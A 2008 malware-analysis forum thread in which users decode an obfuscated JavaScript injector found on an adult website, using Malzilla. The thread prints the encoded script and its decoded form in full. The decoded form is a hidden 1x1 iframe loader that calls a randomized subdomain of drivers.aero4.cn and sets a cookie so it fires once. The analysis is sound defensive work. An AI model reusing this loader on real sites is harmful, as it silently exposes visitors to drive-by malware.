Malware Domain List

Malware Related => Malware Analysis => Topic started by: julevine on February 08, 2008, 11:08:26 pm

Title: decoding scripts in malzilla
Post by: julevine on February 08, 2008, 11:08:26 pm
I need help decoding this double script from freepornfotos.com

I am using malzilla but dont know how to decode the scripts

Code: [Select]
document.write(unescape("%3Cscript%3Eif%28yX%21%3D1%29%7Bfunction%20Gt%28Pl%29%7Breturn%20Pl%7Dtry%7Bvar%20AXa%3D%2788v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS%27%2C%20fVI%3DGt%28%27v%27%29%3B%20var%20DOj%3DArray%2825969%5E26005%2CkJM%28%27171%27%29%2C22080%5E22267%2CkJM%28%27170%27%29%2C29706%5E29883%2C4571%5E4467%2C23665%5E23773%2CkJM%28%27230%27%29%2CkJM%28%27213%27%29%2C26221%5E26303%2CkJM%28%27190%27%29%2C6158%5E6307%2C17023%5E17097%2CkJM%28%27183%27%29%2CkJM%28%27248%27%29%2CkJM%28%27145%27%29%2CkJM%28%27158%27%29%2C1294%5E1463%2C6482%5E6631%2CkJM%28%27189%27%29%2C6799%5E6783%2CkJM%28%27241%27%29%2CkJM%28%27163%27%29%2C5448%5E5613%2CkJM%28%27246%27%29%2C32698%5E32539%2CkJM%28%27229%27%29%2CkJM%28%27209%27%29%2C1769%5E1625%2C10271%5E10493%2CkJM%28%27255%27%29%2CkJM%28%27188%27%29%2CkJM%28%27174%27%29%2CkJM%28%27236%27%29%2C15549%5E15433%2CkJM%28%27247%27%29%2C28161%5E28321%2CkJM%28%27224%27%29%2CkJM%28%27238%27%29%2C26220%5E26335%2CkJM%28%27150%27%29%2CkJM%28%27142%27%29%2CkJM%28%27180%27%29%2C27394%5E27627%2C13100%5E13239%2C17404%5E17235%2CkJM%28%27156%27%29%2CkJM%28%27227%27%29%2C351%5E467%2C8512%5E8703%2C32450%5E32305%2CkJM%28%27232%27%29%2CkJM%28%27250%27%29%2C19346%5E19213%2CkJM%28%27149%27%29%2C5786%5E5649%2CkJM%28%27249%27%29%2C20719%5E20597%2CkJM%28%27141%27%29%2C27205%5E27343%2C23843%5E23991%2CkJM%28%27186%27%29%2CkJM%28%27164%27%29%2C1294%5E1513%2CkJM%28%27131%27%29%2CkJM%28%27134%27%29%2C11816%5E11997%2C32299%5E32393%2C13530%5E13371%2CkJM%28%27133%27%29%2C3077%5E3201%2CkJM%28%27151%27%29%2C11483%5E11313%2CkJM%28%27235%27%29%2C27176%5E27333%2C6220%5E6307%2CkJM%28%27242%27%29%29%2C%20pCw%3B%20var%20vOu%2C%20hDk%3B%20var%20MdE%3D%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%27%2C%20pLG%3D%27%27%3Bfunction%20kJM%28tzZ%29%7Breturn%20parseInt%28tzZ%29%7DAXa%3DAXa.split%28fVI%29%3Bfor%20%28pCw%3D0%3BpCw%3CMdE.length%3BpCw+%3D2%29%7BhDk%3DMdE.substr%28pCw%2C2%29%3Bvar%20HW%3DAXa.length%3Bfor%28vOu%3D0%3BvOu%3CHW%3BvOu++%29%20%7Bif%281%3D%3D0%29%3Bif%28AXa%5BvOu%5D%3D%3DhDk%29break%3B%7DpLG+%3DString.fromCharCode%28DOj%5BvOu%5D%5E216%29%3B%20%7Ddocument.write%28pLG%29%3B%7Dcatch%28Uy%29%7B%7D%7Dvar%20yX%3D1%3C/script%3E"))
 



thank you
Title: Re: decoding scripts in malzilla
Post by: JohnC on February 08, 2008, 11:37:05 pm
After you let MalZilla decode that script you get this:
Code: [Select]
<script>if(yX!=1){function Gt(Pl){return Pl}try{var AXa='88v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS', fVI=Gt('v'); var DOj=Array(25969^26005,kJM('171'),22080^22267,kJM('170'),29706^29883,4571^4467,23665^23773,kJM('230'),kJM('213'),26221^26303,kJM('190'),6158^6307,17023^17097,kJM('183'),kJM('248'),kJM('145'),kJM('158'),1294^1463,6482^6631,kJM('189'),6799^6783,kJM('241'),kJM('163'),5448^5613,kJM('246'),32698^32539,kJM('229'),kJM('209'),1769^1625,10271^10493,kJM('255'),kJM('188'),kJM('174'),kJM('236'),15549^15433,kJM('247'),28161^28321,kJM('224'),kJM('238'),26220^26335,kJM('150'),kJM('142'),kJM('180'),27394^27627,13100^13239,17404^17235,kJM('156'),kJM('227'),351^467,8512^8703,32450^32305,kJM('232'),kJM('250'),19346^19213,kJM('149'),5786^5649,kJM('249'),20719^20597,kJM('141'),27205^27343,23843^23991,kJM('186'),kJM('164'),1294^1513,kJM('131'),kJM('134'),11816^11997,32299^32393,13530^13371,kJM('133'),3077^3201,kJM('151'),11483^11313,kJM('235'),27176^27333,6220^6307,kJM('242')), pCw; var vOu, hDk; var MdE='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', pLG='';function kJM(tzZ){return parseInt(tzZ)}AXa=AXa.split(fVI);for (pCw=0;pCw<MdE.length;pCw+=2){hDk=MdE.substr(pCw,2);var HW=AXa.length;for(vOu=0;vOu<HW;vOu++) {if(1==0);if(AXa[vOu]==hDk)break;}pLG+=String.fromCharCode(DOj[vOu]^216); }document.write(pLG);}catch(Uy){}}var yX=1</script>
 

Remove the script tags from the beginning and end. Then remove "if(yX!=1){" and "try{" and also remove "}catch(Uy){}}var yX=1" from the end.

You can then decode it in MalZilla and will be left with:

Code: [Select]
<script>
function IFrame(){}
IFrame.prototype = {

host : 'drivers.aero4.cn',
path : '/x86/',
cookieName : 'rd4va',
cookieValue : 1,

setCookie : function(name, value)
{
var d= new Date(); d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
},
install : function()
{
if(!this.alreadyInstalled())
{
var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
try { document.write(s) }
catch(e){ document.write("<html><body>" + s + "</body></html>") }
this.setCookie(this.cookieName, this.cookieValue);
}
},
getFrameURL : function()
{
var dlh=document.location.host;
return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.host + this.path;
},
alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getRandString : function()
{
var l=16, c= '0123456789abcdef', o='';
for (var i=0; i < l; i++)   
o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);

return o;
}
}
var o = new IFrame();
o.install();
</script>
Title: Re: decoding scripts in malzilla
Post by: sowhat-x on February 09, 2008, 12:59:48 am
Lol,JohnC...now that was fast! :)

Never really bothered myself getting into javascript,
just basic stuff that came up as a result out of daily needs...
so when bobby released Malzilla,I went...'wow - this really saves my butt (and time!)'  :D
To be honest,I wasn't even really appreciating js that much,what I was thinking was kind of...
''...oh well,in the final end,it's meant for guys dedicated strictly to professional web development,
they're the target group here..." - something which is quite a bit away beyond my personal interests...

Until one day,he-he....I came across this tool from OWASP,
a full-blown program completely written under js...and it certainly changed my mind for good:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It's completely irrelevant with casual web development and malware analysis also of course,
meant for penetration testing and such stuff...
But it's an excellent proof that even the supposedly 'simpler' scripting languages,
can be really powerful if you seriously dive into them...